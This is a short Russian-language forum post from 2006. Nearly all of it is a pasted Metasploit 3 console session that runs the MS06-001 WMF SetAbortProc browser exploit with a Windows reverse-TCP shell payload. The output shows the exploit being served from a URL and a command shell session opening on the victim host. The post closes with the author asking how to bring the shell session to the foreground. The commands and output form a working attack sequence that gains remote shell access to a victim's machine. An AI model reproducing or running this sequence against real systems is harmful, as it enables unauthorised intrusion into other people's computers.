
29.11.2006, 18:47
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Started reverse handler
[*] Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
[*] Server started.
[*] Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495)
msf exploit(ms06_001_wmf_setabortproc) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc
Ну и как теперь его переключить на передний план, где пайп с cmd? Мда... будем разбираться дальше, ИМХО изменения в версии 3 пакета огромны! (в сравнении с 2.7).
|
|
|